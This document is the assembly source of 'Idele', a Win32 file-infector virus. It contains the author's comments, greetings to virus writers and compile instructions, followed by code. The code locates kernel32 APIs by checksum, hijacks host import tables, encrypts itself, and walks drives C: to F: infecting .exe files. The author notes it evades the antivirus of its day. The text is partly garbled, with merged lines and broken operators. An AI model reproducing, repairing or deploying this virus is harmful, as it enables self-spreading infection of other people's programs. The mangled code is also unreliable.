Win32.IDele
-------------------------------------------------- -------------- [Idele.asm] ---
.386P
.MODEL FLAT
Comment $
Idele Virus Version 1.9
By DoXTor L. /[t.i], July-December 2000
Test Version !! (Infect Goat * .exe Files)
DiscLaimer:
This Program is a virus.
IT's Not Designed to Be a destructive one, but anyway it's a virus!
This Virus is My Third ONE, Designed for MS-Windows.
All Tests WERE Performed on Win95 / Winnt Platforms.
But I'm Quite Sure It Runs Fine on Win98 TOO.
IT Don't work Fine on Win2k.
IT Was Written for Education!
Greets:
-ANDROGYNE: I Hope to See Soon A Win32 Virus of Your Own
My "dear student" :)
-BumbleBee: Thanks for the informations
-Cryptic: Thanks for Beta-Testing
-Del armg0: Are you a ready of "pif le chien"? :)
-Dyrdyr: You're a Maths Genius, Man :)
-Mandragore: a day without alcohol / weed is a bad day?
-Spanska: Fat 25yrs Old Girls Are Not Necessary Ugly;
-T00fic: do you like my poetry? :)
-Darkman: Tania Fan Number One :)
-Giga: I'm Too Fat To Be Able To Ride A Pony :)
-Lordjulus: i can't wait for your next tutorials :)
-M: Heya "Marchand de Sabl"!
-Tally: a new virus for your collection!
-T2: Is there a life be4 the death?
Vecna: When Is The next full moon? :)
... and all the vxers from Undernet IRC Servers
Free Viruses!
Virus is knowledge!
SO Trading Viruses with Ratios
Is An Opposition to the Free Spreading of Knowledge!
Description:
This Virus Usess Several ViRed Technics.
Checksum / crc32 routines to recognize API STRING in Export Section
Of kernel32.dll
The main feature is what the the section flags of host aren't modified
.
How we do what?
The Virus Uses The GlobalAlloc API.
THIS API IS CALLED FIRST, TO CREATE A Memory Space to Decrypt and Run To
Main Part of Virus There. But we need a special routine to force targets
TO USE this API.
To do what, we search in import Table of the target, an API String Name
With 11 or more, letters.
We patch the name with "globalalloc" string.
At Run Time, The Infected Host Is Load in Memory by Windows, The Address
Of Globalalloc API is Set. Windows Makes The Job for US :)
So We need to patch the place this address is, with the correct
One, WE Use getProcaddress. (We can't pre-calculate a checksum for it
Because the name of this api isn't known before infread time)
The Virus Uses The Allocated Memory Space To Move To / Decrypt Its Main Routine.
So When the Decryption is Completed, The Virus Jumps To That New Memory Space.
IT Creates An Infectious Thread and returns to host.
The Virus Uses A * New * EPO Technic. The Virus Don't Patch The Target Code!
AND The Virus Don't Change The entry point of target pee.
As Far I Know, this is the first virus to use the folload technic.
A Windows Application Contains In Its Memory Space An Array That Will BE
Fullfilled with apis addresses by the over the operationing sytem.
The Virus At Infection Time, Changes in Target The Address of The Import
Table and create a small new one. The old table is fullfilled with
The Virus Address. So when The Infected Host Calls An API, The Virus
Will Be Called First. THE FIRST Thing, The Virus Does, IS To Rebuild
The import Table of The Host At The Right Place!
Before Infection: Import Table Code Section
API1:> ------------------ "Call [API1]"
Xxxx
API2:
YYYY> ------------------ "Call [API2]"
(...) (...)
AfTER infection:
Old Import Table Code Section New Import TABLE
API1: API1:
> Virus Address <> ----------- "Call [API1]" XXXX
API2: (...)
> Virus Address <:> ------------ "Call [API2]"
(...) API (N) :( n is offen> = 4)
> GLOBALLOC ADDRESS <
MOST People in Vx-Scene Thinks Applications in High Level Language
Call Apis Using Only Two Ways:
1) 2)
Call API: Call [> Address in import table <]]
(...)
API:
JMP [> address in import table <]]
They is wrong!
In Notepad.exe of Win95, I Have Found Code Like That:
MOV EDI, DWORD PTR [> Address In Import Table <]]
Call Edi
And Believe Me, MOST OF Applications (Netscape 4.5 ...)
CAN Use That Way to Call AN API.
An Infected Program Could Be Unstable Due To The Way IT Performs
An API CALL!
Happily The Applications Rarely Call An Api from Kernel32,
Using an "unusal" Way, At the Very Beginning of Their Code!
THE W (RITE) Attribute Is Set in The Section The Import Table Is To BE
WIN NT4 Compatible.
Patch The Import Table At Run Time Seems Impossible Under Win2k!
Even the use of writeprocessMemory API Don't Help To Solve That Problem :(
Happily there is a solution to bypass what ... but it's annother story :)
The Infectious Routine Is A Classic ONE:
-Search X Target (s) on Whole C:, D:, E:, F: DRIVES AND INFECTS IT / THEM.
-The Thread Begins with a pause, Virus Stop During x Seconds Before to Infect.
-The Virus is Composed of 2 Parts:
A Loading Routine to create Memory Space and Decrypt the Virus there
.
This Virus isn't Detected by Major Anti-Viruses at The Time It Was Written.
So Once Again, Be Careful!
To Compile, Use the Following File:
Syntax is: Compile Virus (and not "compile virus.asm)
[Assuming The Virus Source Code Is Named: Virus.asm]
The assembler used is tasm 5.0 (c) Borland
/ begin of compile.bat /
Tasm32 / m / ml% 1.ASM
TLINK32 / TPE / AA / C% 1,% 1.EXE, IMPORT32.LIB
Rem Pewrite.exe Set The Write Attribute in All Sections Headers
Pewrite% 1.exe
DEL% 1.obj
DEL% 1.map
/ End of compile.bat /
To test the virus change the string "* .exe", 0 INTO "TEST * .EXE", 0
Remember the Virus Size Need to Be a 4 Multiple!
$
% Out Warning!
% OUT you have just compiled a ful FunctionNal Virus!
% OUT Erase It, if you don't know what you're doing!
EXTRN EXITPROCESS: Proc; ONLY for the 1st generation
EXTRN Messageboxa: Proc
EXTRN GETPROCADDRESS: PROC
EXTRN GETMODULEHANDLEA: PROC
EXTRN SLEEP: PROC
.DATA
T DB "Warning!", 0
Message DB "Ready to Be Infected", 0ah, 0DH
DB "by idele", 0ah, 0DH
DB "Virus v 1.9 /[t.i]?", 0ah, 0DH, 0
Message2 DB "EXIT Infection?", 0
KRL32 DB "kernel32.dll", 0
EP0 DB 0,0
EP DB "EXITPROCESS", 0
Hereisaddy4Message2 DD 0
FAKE_OFT DD Offset EP0, 0, 0, 0
FAKE_FT DD 0, 0, 0, 0
Addy4EP DD 0
.code; executable starts here
Host:
Mov Eax, Loaderlength
Mov Eax, Endvir-Beginvir; The Real Size Is A Multiple of 4
Push 30h; Warning Message
Push Offset T
Push Offset Message
PUSH 0
Call Messageboxa
Push Offset KRL32; Retrieve Kernel32.dll Address
Call getModuleHandlea
Push Offset Ep; Retrieve EXITPROCESS ADDRESSPUSH EAX
Call getProcAddress
Mov DWORD PTR [Addy4EP], EAX
Mov DWORD PTR [IMPORT], Offset Addy4EP
MOV DWORD PTR [VA_API], Offset EP
Mov DWORD PTR [VA_OFT], OFFSET FAKE_OFT
MOV DWORD PTR [VA_FT], OFFSET FAKE_FT
Mov DWORD PTR [APIHACK], OFFSET EP
Lea Eax, Hereisaddy4Message2
Mov DWORD PTR [EAX], OFFSET MSG2
XOR EBP, EBP
JMP Fillupjump
MSG2:
Push 5000; Time Needed to Infect
Call Sleep
Push 30H; EXIT MESSAGE
Push Offset T
Push Offset Message2
PUSH 0
Call Messageboxa
Push 0; Exit First Generation Virus
Call EXITPROCESS
[REAL START OF VIRUS]:
Beginvir:
Call delta
Delta:; Compute Delta Offset
POP EBP
Sub EBP, Offset Delta
MOV Eax, DWORD PTR [ESP 32]; Search in Stack Return
Address
Mov Cl, Byte Ptr [EAX-5]; Read First byte of "Call"
OpCode
CMP CL, 15H; IS 15?
JNZ Jump_far; NO ... it's a call yyyy
MOV EAX, DWORD PTR [EAX-4]; ... Yes it's call [xxxxx]
Read XXXX, XXXX IS A POINTER
To API Address
JMP Fillupjump
Jump_far:; it's a call yyyy
Add Eax, DWORD PTR [EAX-4]; What is the destination of
INC EAX; "CALL YYYY"?
Inc EAX;
MOV EAX, DWORD PTR [EAX];
;
Fillupjump:
MOV DWORD PTR [Jump May EBP], EAX
ComputekerneEladdress:
DB 8BH, 15H; MOV EDX, DWORD [IMPORT]
Import dd 0; import is an address in import table
[] = adRess of GlobalAlloc (in Second Generation)
***** Search kernel32.dll address in Memory
; In: edx = address in kernel32
***** OUT: EDX = kernel32.dll Address
MOV EAX, EDX
LOOP:
Dec edx
CMP Word PTR [EDX], "ZM"
Jnz loop
MZ_Found:; "MZ" Found
Is it it beginning of kenel?
MOV ECX, EDX
MOV ECX, [ECX 03CH]
Add ECX, EDX
CMP ECX, EAX
Jg loop; this test avoid Page Fault
CMP Word PTR [ECX], "EP" JNZ LOOP
***** End of search kernel routine
***** Search Apis Addresses Needed
; In: edx = image base of kernel32
***** OUT: Searched Apis Addresses Are Put in a Table of DWORD
MOV EAX, [EDX 3CH]; EAX = RVA of PE-HEADER
Add Eax, EDX; EAX = Address of PE-HEADER
MOV EAX, [EAX 78H]; EAX = RVA of Export Directory Section
Add Eax, EDX; EAX = Address of Export Directory Section
MOV ESI, [EAX 20H]; ESI = RVA of the Table Containing Pointers
Add ESI, EDX; ESI = Address of this Table,
a pointer to the name of the first
Exported function
XOR EBX, EBX; EBX HOLDS API INDEX
Dec EBX
MOV ECX, APINB; Number of Apis Remaining
SUB ESI, 4
Mainloop:
Add ESI, 4
Inc EBX
; ***** CRC computing of the current api name
; IN: ESI: RVA of Name
; ***** OUT: CRC Variable Contains The CRC of current Name String
ComputeCRC:
Pushhad
MOV ESI, DWORD PTR [ESI]
Add ESI, EDX
XOR ECX, ECX
XOR EAX, EAX
Again:
Lodsb
OR Al, Al
JZ SEEU
Add Cl, Al
ROL Eax, Cl
Add ECX, EAX
JMP Again
Seeu:
MOV DWORD PTR [CRC EBP], ECX
Popad
***** End of CRC computing routine
***** TEST CRC
; IN: ESI: Current API Name Address
; OUT: ESI = FOLLOWING NAME
***** ECX = API (Pointer) INDEX in the "Table of Names"
TestCrc:
Push EAX
MOV EAX, DWORD PTR [CRC EBP]
MOV ECX, APINB 1
Lea EDI, APILIST EBP
Repne scaSD
POP EAX
Jecxz mainloop
Found:
Pushhad
Add Edi, Offset CloseHandle- (Offset Apilist 4); API Position
In ou Rether
MOV ECX, DWORD PTR [EAX 36]
Add ECX, EDX
LEA ECX, [ECX 2 * EBX]
MOV BX, Word PTR [ECX]
MOV ECX, DWORD PTR [EAX 1CH]
Add ECX, EDX
MOV ECX, DWORD PTR [ECX 4 * EBX]
Add ECX, EDX
Mov DWORD PTR [EDI], ECX
Popad
Loop mainloop
***** End of crc test routine; ***** End of Apis searching routine
Routine:
; On Copie Les Adresses Que Windows A MIS Dans La Table FT Vers
; la vraie table qui commence? VA_FT
WE NEED TO PATCH THE IMPORT TABLE OF HOST.
; But first we need to compute the address of the api we have replaced
; by globalallococ
[Compute Address of Hacked API]:
Push Edx
Lea EBX, APIHACK EBP
Push EBX
Push Edx
Call dword ptr [_getprocaddress ebp]
MOV DWORD PTR [APIORIGINALADD EBP], EAX
Call DWORD PTR [getCurrentProcessid EBP]
Push EAX
PUSH 0
Push 10h or 20h OR 08H
Call DWORD PTR [OpenProcess EBP]
XCHG EAX, EBX
POP EDX
XOR ECX, ECX
MOV ESI, DWORD PTR [VA_OFT EBP]
Lea EDI, API_Buffer EBP
Aloop:
Lodsd
OR EAX, EAX
Jnz Followme
OR CH, CH
JNZ Getout
MOV EAX, DWORD PTR [VA_API EBP]
IncC
JMP computeapi
FOLLOWME:
Add Eax, DWORD PTR [ImageBase EBP]
INC EAX
INC EAX
Computeapi:
PUSH ESI
Push EDI
Push ECX
Push Edx
Push EAX
Push Edx
Call dword ptr [_getprocaddress ebp]
POP EDX
POP ECX
POP EDI
POP ESI
Stosd
INC CL
JMP Aloop
Getout:
PUSH 0
XOR CH, CH
SHL ECX, 2
Push ECX
LEA EAX, API_Buffer EBP
Push EAX
Push DWORD PTR [VA_FT EBP]
Push EBX
Call Dword PTR [WriteProcessMemory EBP]
[RESTORE HOST HACKED API]:
PUSH 0
Push 4
Lea Eax, ApioriginalAdd EBP; SOURCE
Push EAX
DB 68h; Push value
HackAdd:; Destination
DD 0
Push EBX
Call Dword PTR [WriteProcessMemory EBP]
[CREATE_THREAD]:
Lea EBX, ThreadID EBP
Push EBX
PUSH 0
PUSH 0
Lea EBX, _thread EBP
Push EBX
PUSH 0
PUSH 0
Call DWORD PTR [CreateTHRead EBP]
[Go ON API CALL]:
Popad
DB 0FFH, 25H; JUMP []
Jumpaway DD 0
_Thread:
Call deltaoff
Deltaoff:
POP EBP
Sub EBP, Offset Deltaoff
Push MiliseConds
Call dword ptr [_sleep ebp]
[SAVE CURRENT DIRECTORY]:
LEA EAX, Direxe EBP
Push EAX
Push 260
Call DWORD PTR [getCurrentDirectorya EBP]
***** Main routine (Directory-Tree Search Algorithm)
Mov DWORD PTR [Counter EBP], HOWMANY
MOV DWORD PTR [DEPTH EBP], 0
SearchDisk:
INC DWORD PTR [Key EBP]
MOV EAX, DWORD PTR [Key EBP]
XOR EDX, EDX
XOR ECX, ECX
MOV CL, 4
Div ECX
XCHG EAX, EDX
Add Al, 43H
MOV BYTE PTR [DiskName EBP], Al
Lea Eax, DiskName EBP
Push EAX
Call DWORD PTR [GetDriveTypea EBP]
CMP Al, 3
Jnz SearchDisk
DB 0C7H, 85H
DD Offset FileName
DiskName DB "C"
DB ":", 0
Find0:
Inc DWORD PTR [DEPTH EBP]
Push EBX
Lea Eax, FileName EBP
Push EAX
Call DWORD PTR [SetCurrentDirectorya EBP]
OR EAX, EAX
JZ UPDIR0
****** InfectCurrentdir
LEA ESI, FileAttributes EBP
PUSH ESI
LEA EDI, FINDMATCH EBP; Target String Name
Push EDI
Call DWORD PTR [FindFirstFilea EBP]; Return A Search Handle
MOV EBX, EBX; Handle IS PUT INTO EBX
INC EAX
JZ Findf
Call Infect
NEXT:
PUSH ESI
Push EBX
Call [FindNextFilea EBP]
OR EAX, EAX
JZ Findf
Call Infect
JMP next
***** End of Infect Current Dir Routine
[FindFirst Dir]:
FINDF:
Push EBX
Call DWORD PTR [FindClose EBP]
LEA ESI, FileAttributes EBP
PUSH ESI
Lea EDI, FINDMATCH2 EBP
Push EDI
Call DWORD PTR [FindFirstFilea EBP]
MOV EBX, EAX
INC EAX
JZ UPDIR0
Find:
MOV EAX, DWORD PTR [FileAttributes EBP]
And Eax, 10h
JZ FINDN
CMP BYTE PTR [FileName EBP], "."
JNZ Find0
[FindNext Dir Routine]:
Findn:
LEA ESI, FileAttributes EBP
PUSH ESI
Push EBX
Call DWORD PTR [FindNextFilea EBP]
OR EAX, EAX
JNZ Find
Updir:
Push EBX
Call DWORD PTR [FindClose EBP] UPDIR0:
DEC DWORD PTR [DEPTH EBP]
JZ EXIT
POP EBX
Lea Eax, Dotdot EBP
Push EAX
Call DWORD PTR [SetCurrentDirectorya EBP]
JMP FINDN
EXIT0:
POP EAX
EXIT:
Push EBX
Call DWORD PTR [FindClose EBP]
[RESTORE SAVED DIRECTORY]:
LEA EAX, Direxe EBP
Push EAX
Call DWORD PTR [SetCurrentDirectorya EBP]
JMP _thread
Infect:
Pushhad
Testfile:
Add DWORD PTR [FileSize EBP], Virlength
; ***** Test if the file is a true pe-executable file
Call OpenFileStuff
JC EXIXFECTERROR
Push EDX; Save mapping address
CMP DWORD PTR [EDX 3CH], 200H; Avoid Page Fault
JG EXITINFECTERROR0
Add Edx, DWORD PTR [EDX 3CH]; Edx Points to PE-HEADER
CMP Word PTR [EDX], "EP"; TRUE PE EXE THERE?
JNZ EXITINFECTERROR0
***** End of Exe-PE Test
***** ALREADY INFECTED?
POP ECX
CMP Word PTR [ECX 12H], "IT"; infected?
JZ EXITINFECTERROR
Push ECX
**** End of Infection Test
MOV EDI, EDX
Add EDI, 18H; EDI = Beginning of Optional Header
[COMPUTE RVA OF FIRST Section Header]:
MOV EBX, DWORD PTR [EDI 10h]; EBX = Entry Point RVA
Push Ebx; Save IT
Movzx ECX, Word PTR [EDX 14H]; CX = Size Optionnal Header
Add Edi, Ecx; EDI Points to 1st Section Header
Movzx ECX, Word PTR [EDX 06H]; CX = Number of Sections
MOV DWORD PTR [SECTN EBP], ECX
MOV EBX, EDI; EBX Points on 1st Section Header
[COMPUTE LAST Section Header Address]:
XOR EAX, EAX; SET EAX = 0
Dec Ecx; ECX = Number of Sections -1
MOV ESI, EDI; ESI = First Section Header
Address
MOV Al, 28h; Al = Size of A Section Header
Mul Cl; EAX = 28H * (Number of Section-1)
Add ESI, ESI ESI = Pointer To Last Section
HEADER
EBX, EDI = Beginning of 1st Section HEADER
POP EAX; Put Entry Point RVA in Eax; ***** Search Code Section:
; In: EBX HOLDS File Pointer TO First Section Header
;: Eax Holds Entry Point RVA
***** OUT: EBX HOLDS File Ptr To The "code section"
NOTENOUGH:
Add Ebx, 28h
CMP DWORD PTR [EBX 12], EAX
JG Foundcode
Loop notenough
JMP EXITINFECTERROR0
Foundcode:
SUB EBX, 28H
***** Search Code section End
CMP DWORD PTR [ESI 16], 0; Don't Want To Infect Files
JZ EXITINFECTERROR0; with RAWDATA SIZE = 0 ...
NO REAL Section On Disk Here
; if we try ... File is overwritten!
Mov Eax, DWORD PTR [ESI 24h]; Don't Want To Infect Files
And Eax, 80000000h; with a last section Writable
JNZ EXITINFECTERROR0; SURELY An Exe Archive or Packed File
EDI = Begin of Section Headers
EBX = Begin of Code Section
EAX = Begin of Code Section Header
Mov Eax, EDI
POP EDI; Restore Map Address
Push EDI; Save ""
Push EAX
Mov ECX, LoaderLength
Dec ECX
Add Edi, DWORD PTR [EBX 10h]
Add Edi, DWORD PTR [EBX 14H]
Dec Edi
EMPTY:
STD
XOR Al, Al
Repe scaSB
XCHG Eax, EDI
POP EDI
OR ECX, ECX
CLD
JNZ EXITINFECTERROR0
[Import Table Patching Routine]:
Pushhad
MOV EAX, DWORD PTR [EDX 18H 1CH]; Save on Stack ImageBase
MOV DWORD PTR [ImageBase EBP], EAX
Push EAX
MOV EAX, DWORD PTR [EDX 80H]; EAX = Address of The
"Import Table"
[SEARCH IMPORT Section]:
; in: edi = map pointer to first section header
Pushhad
SearchImport:
Add Edi, 28h
CMP DWORD PTR [EDI 12], EAX
JG FoundImport
JMP SearchImport
FoundImport:
Sub EDI, 28H
OR DWORD PTR [EDI 24H], 80000000H; Set W Attribute To
Import Section; IMPORT Section
MOV EAX, DWORD PTR [EDI 12]
Add Eax, DWORD PTR [EDI 10h]
Mov ESI, ESI ESI = RVA to the end of import; section
Call RVA2OFFSET; EAX = Map Pointer to the end of
Import Section; IMPORT Section
XOR ECX, ECX
[How Many DWORD Are Free In The end of the import section]:
HOWMANYDW:
Sub Eax, 4
SUB ESI, 4
CMP DWORD PTR [EAX], 0
JZ HOWMANYDW
Add Eax, 8; We don't use the first free dword
Add ESI, 8
MOV DWORD PTR [RVA_NewFT EBP], ESI
MOV DWORD PTR [fp_newft ebp], EAX
Popad
; End of Search Import Section
EAX = RVA "imports table"
EBX = RVA "Sections Table"
Call RVA2OFFSET; EAX = File Pointer to Import Table
XCHG EAX, EDI; EDI = "" "" "
SearchDLL:
MOV EAX, DWORD PTR [EDI 12]
OR EAX, EAX
JE _NOTFOUND
Call RVA2OFFSET
CMP DWORD PTR [EAX], "NREK"; Are there Imports
JE DLLFOUND; from kernel32.dll?
CMP DWORD PTR [EAX], "NREK"; ""
JE DLLFOUND
Add EDI, 20
JMP SearchDLL
_NOTFOUNDV:
_NOTFOUND:
Popad
JMP EXITINFECTERROR0
DllFound:
EDI = file pointer to kernel32.dll structure in target
MOV DWORD PTR [EDI 4], 0; TIMEDATE Stamp Set To 0
Mov DWORD PTR [EDI 8], 0
MOV EAX, DWORD PTR [EDI]; EAX = RVA of OriginalFirstthunk
Add EDI, 16
MOV EDX, DWORD PTR [EDI]; EDX = RVA of Firstthunk
MOV DWORD PTR [fp_fieldft ebp], EDI
Push Eax; Compute File Ptr To Host First Thunk
MOV EAX, EDX
Call RVA2OFFSET
MOV DWORD PTR [fp_ft ebp], EAX
POP EAX
POP ECX; Restore Image Base
Push Ecx; Save It Again
MOV DWORD PTR [RVA_FT EBP], EDX
Add ECX, EDX; Compute Va of Firstthunk
MOV DWORD PTR [VA_FT EBP], ECX; Save IT
OR EAX, EAX
JZ NO_OFT
Pushhad
Push EAX
Add Eax, DWORD PTR [ImageBase EBP]
MOV DWORD PTR [VA_OFT EBP], EAX
POP EAX
Call RVA2OFFSET
MOV DWORD PTR [FP_OFT EBP], Eax; File Pointer to Original First; Thunk
[COMPUTE the NUMBER OF IMPORTED APIS from kernel32.dll]:
XOR ECX, ECX
Sub Eax, 4
Apiscan:
Inc ECX
Add Eax, 4
CMP DWORD PTR [EAX], 0
JNZ Apiscan
Dec Ecx; ECX Holds Number of Imported Apis from k32
MOV DWORD PTR [Sizet EBP], ECX
*********************************************************** *******************
Popad
JMP OFT_FOND
NO_oft:
MOV EAX, EDX
OFT_FOND:
Call RVA2OFFSET; EAX Contains the RVA of an Array of
RVAS.
; Each of these RVAS Points to A Structure
; The number of structures equals the
Number of Imported Functions from
Kernel32.dll
WE NEED TO Convert Eax INTO A FILE
Pointer.
Sub EDX, 4
Sub Eax, 4
Lea EDI, APIHACK EBP
LOOP2:
Add Eax, 4; EAX = Map Ptr To Off ARRAY
Add EDX, 4; EDX = RVA, browsing ft array
MOV ESI, DWORD PTR [EAX]; Read An RVA of Array
OR ESI, ESI
JZ _NOTFOUND
Test ESI, 80000000H; Ordinal?
Jnz loop2
XOR ECX, ECX
XCHG Eax, ESI; Convert RVA to File Offset
Call RVA2OFFSET
XCHG Eax, ESI
INC ESI; ESI Points to API Name
Inc ESI
Push EDI
PUSH ESI
Doagain:; Move The Api Name Into Apihack
Movsb
Inc ECX
CMP BYTE PTR [ESI-1], 0; End of String?
Jnz doagain
POP ESI
POP EDI
CMP ECX, 12; String ", 0" IS 12 char?
JL loop2; not enough? ... Go back to loop2
Pushhad
Add Eax, 4
MOV ESI, DWORD PTR [EAX]
Inc ESI
Inc ESI
Add ESI, DWORD PTR [ImageBase EBP]
MOV DWORD PTR [VA_API EBP], ESI
Mov DWORD PTR [EAX], 0
Popad
XCHG ESI, EDI
Lea ESI, GLOBALAPI EBP
MOV CL, 12; GLOBALLOC STRING REPLACE
Rep Movsb; One of Api of the Host
POP EDI; EDI = ImageBase of Target
Add Edx, EDI; Address In Import Table
MOV DWORD PTR [HackAdd EBP], EDX
MOV DWORD PTR [API_FIELD EBP], EDX
Popad
; ***** End Import Table Patching RoutinePop Edi; Restore MapAddress
Push Eax; Save Pointer to Code Loader
Add DWORD PTR [Key EBP], 12345678H; Modify Key
MOV Word PTR [EDI 12H], "IT"; Mark The Infected Target
MOV DWORD PTR [EDX 18H 24H], 200H; Set Filealigment = 200h
MOV ECX, DWORD PTR [ESI 0CH]
Add Edi, DWORD PTR [ESI 14H]; Pointer to Reloc Section
CMP DWORD PTR [EDX 18H 96 40], ECX
Jnz Noreloc
CMP DWORD PTR [ESI 10H], 0A00H
JNGE NORELOC
[ERASE RELOCATION Section]:
MOV DWORD PTR [EDX 18H 96 40], 0
MOV DWORD PTR [EDX 18H 96 44], 0
MOV DWORD PTR [ESI], "ADP."; Change the section Name
MOV DWORD PTR [ESI 4], "AT"
Add ECX, DWORD PTR [ImageBase EBP]
MOV DWORD PTR [LastSECTIONCode EBP], ECX
Sub DWORD PTR [FileSize EBP], Virlength
JMP CopyEncrypt
*********************************************************** **********************
Noreloc:
Add EDI, DWORD PTR [ESI 10H]; Add Rounded Up Last Section Raw-Size
[COMPUTE BEGINNING OF CODE IN The Last Section, in Memory]:
MOV ECX, DWORD PTR [ESI 0CH]; Last Section RVA in Memory
Add ECX, DWORD PTR [ESI 10H]; Add Last Section Rounded Up Size
Add ECX, DWORD PTR [ImageBase EBP]
MOV DWORD PTR [LastSECTIONCode EBP], ECX
[Update Size Field In Target Last Section Header]:
Add DWORD PTR [ESI 10H], 0A00H
Add DWORD PTR [ESI 08H], 1000H
[Update Size Fields in Target Optional HEADER]:
Add DWORD PTR [EDX 50H], 1000H
CopyEncrypt:
MOV ECX, DWORD PTR [RVA_NewFT EBP]
MOV ESI, DWORD PTR [fp_fieldft ebp]
Mov DWORD PTR [ESI], ECX
MOV ESI, DWORD PTR [API_Field EBP]
SUB ESI, DWORD PTR [RVA_FT EBP]
Add ESI, DWORD PTR [RVA_NewFT EBP]
MOV DWORD PTR [RETURNADD EBP], ESIMOV DWORD PTR [IMPORT EBP], ESI
[Copy and Encrypt Code in the last section]:
MOV ECX, (Endvir-Beginvir) / 4
Lea ESI, Beginvir EBP
Call Crypt
[ClearHeap]:
Push EDI
MOV ECX, DWORD PTR [FileSize EBP]
Sub EDI, DWORD PTR [MapAddress EBP]
SUB ECX, EDI; ECX = Number of Useless Bytes in
; the heap
POP EDI
XOR Eax, Eax; SET EAX TO 0
Nullify:
Repne Stosb
[COMPUTE New Entry Point]:
MOV EAX, DWORD PTR [EBX 0CH]
Add Eax, DWORD PTR [EBX 10h]
Mov ECX, LoaderLength
SUB EAX, ECX; EAX = RVA of Loader
Add Eax, DWORD PTR [EDX 18H 1CH]; add imagebase
Push Ecx; Save Loader Size
MOV ECX, DWORD PTR [SIZET EBP]
MOV EDI, DWORD PTR [fp_ft ebp]
Rep StosD
MOV ESI, DWORD PTR [fp_oft ebp]
MOV EDI, DWORD PTR [fp_newft ebp]
CopyMore:
Movsd
CMP DWORD PTR [ESI], 0
Jnz Copymore
POP ECX; Restore Loader Size
[Copy Loader Code to Target File On Disk]:
POP EDI; Restore Pointer (on Disk) To Code Loader
Lea ESI, BeginLoader EBP
Repne Movsb
Call CloseFilestuff
Popad
DEC DWORD PTR [Counter EBP]
JZ EXIT0
RET
EXITINFECTERROR2:
POP EAX
EXITINFECTERROR0:
POP EAX
ExitInfectError:
Sub DWORD PTR [FileSize EBP], Virlength
Call CloseFilestuff
Popad
RET
OpenFileStuff:
PUSH 0
PUSH 0
Push 3
PUSH 0
Push 1
PUSH 80000000h OR 40000000H; Read and Code Abilities
Lea Eax, FileName EBP
Push EAX
Call Dword PTR [CreateFilea EBP]
Mov DWORD PTR [FileHandle EBP], EAX; Save FileHandle
PUSH 0
Push DWORD PTR [FileSize EBP]
PUSH 0
Push 4
PUSH 0
Push DWORD PTR [FileHandle EBP]
Call DWORD PTR [CREATEFILEMAPPINGA EBP]
Mov DWORD PTR [MapHandle EBP], EAX
Push DWORD PTR [FileSize EBP]
PUSH 0
PUSH 0
Push 2
Push DWORD PTR [MapHandle EBP] Call DWORD PTR [MapViewOffile EBP]
OR EAX, EAX
JZ EXITOPENFILESTUFFERROR
MOV DWORD PTR [MapAddress EBP], EAX; EAX = address of mapping
XCHG EAX, EDX
CLC
RET
EXITOPENFILESTUFFERROR:
STC
RET
CloseFilestuff:
Unmap:
Push DWORD PTR [MapAddress EBP]
Call dword PTR [UnmapViewOffile EBP]
Closemaphandle:
Push DWORD PTR [MapHandle EBP]
Call Dword PTR [CloseHandle EBP]
Resizefile:
PUSH 0
PUSH 0
Push DWORD PTR [FileSize EBP]
Push DWORD PTR [FileHandle EBP]
Call DWORD PTR [setFilePointer EBP]
Markendoffile:
Push DWORD PTR [FileHandle EBP]
Call DWORD PTR [STENDOFFILE EBP]
RESTORETIME:
Lea Eax, LastWritetime EBP
Push EAX
Lea Eax, LastAccesstime EBP
Push EAX
Lea Eax, CreationTIME EBP
Push EAX
Push DWORD PTR [FileHandle EBP]
Call DWORD PTR [setFileTime EBP]
Closefile:
Push DWORD PTR [FileHandle EBP]
Call Dword PTR [CloseHandle EBP]
RestorefileAttributs:
Push DWORD PTR [FileAttributes EBP]
Lea Eax, FileName EBP
Push EAX
Call DWORD PTR [SetFileAttributesa EBP]
RET
Change a rva to a file Pointer
; In: EBX Points to First Section
; OUT: EAX Contains the File Offset
RVA2OFFSET:
Push EBX
Push ECX
MOV ECX, DWORD PTR [Sectn EBP]
_LOOP:
CMP DWORD PTR [EBX 12], EAX
Jg _find
Norawdata:
Add Ebx, 28h
Loop _Loop
_Find:
SUB EAX, DWORD PTR [EBX-28H 12]
Add Eax, DWORD PTR [EBX-28H 20]
Add Eax, DWORD PTR [MapAddress EBP]
POP ECX
POP EBX
RET
BeginLoader:
Pushhad
Push 2000H
PUSH 0
DB 0FFH, 15H; Call GlobalLococ
ReturnAdd DD 0
Push Eax; Prepare Jump To Virus
Xchg Eax, EDI; Added to Modify Scan String
MOV ECX, (Virlength) / 4
DB 0BEH; MOV ESI, ****
LastSecionCode DD 0Crypt:
Lodsd
DB 35H
Key DD 0ABCDEF12H
Stosd
Dec ECX
JNZ Crypt
Ret; Go to Beginning Of Code
EndLoader:
Constants:
Apinb EQU 21
Maxpath EQU 260
Miliseconds EQU 1500
HowMany EQU 1
Virlength EQU 0A00H
Virlength0 Equ Endvir0-Beginvir
LoaderLength Equ Endloader-BeginLoader
Sign DB "Idele Virus Version 1.9"
DB "doxtorl./[t.i]/dec.y2k"
Sizet DD 0
VA_API DD 0
ImageBase DD 0
FP_oft DD 0
VA_oft DD 0
FP_FieldFT DD 0
FP_FT DD 0
RVA_FT DD 0
VA_FT DD 0
FP_NewFT DD 0
RVA_NewFT DD 0
VA_NewFT DD 0
FindMatch DB "* .exe", 0
FindMatch2 db "*. *", 0
Dotdot DB "..", 0
GlobalApi DB "GlobalAlloc", 0
APIHACK DB "GlobalLall", 0; ONLY for THE
1st generation
DB 26 DUP (0); reserved for char
; OF API NAME FOUND
Apilist dd 0fdbe9ddfh; CloseHandle
DD 04B00FBA1H; CreateFilea
DD 00D6EA22EH; CREATEFILEMAPPINGA
DD 0BE307C51H; CreateThread
DD 0BE7B8631H; FindClose
DD 0C915738FH; FindfirstFilea
DD 08851F43DH; FINDNEXTFILEA
DD 028F8C6FBH; GetCurrentDirectorya
DD 00029ECFBH; GetCurrentProcessid
DD 09C3A5210H; GetDriveTypea
DD 040BF2F84H; getProcAddress
DD 032BedDC3H; MapViewoffile
DD 0C329F65BH; OpenProcess
DD 08E0E5487H; SetCurrentDirectorya
DD 0BC738AE6H; setndoffile
DD 050665047H; SetFileAttributesa
DD 06D452A3AH; SetFilePointer
DD 09F69DE76H; setFiletime
DD 03A00E23BH; SLEEP
DD 0FAE00D65H; UnmapViewOffile
DD 01E9FA310H; WriteProcessMemory
Endvir:; what is stocking isn't appended to Target
Apiaddresses:
CloseHandle DD 0
CreateFilea DD 0
CreateFilemappinga DD 0
CreateThread DD 0
FindClose DD 0
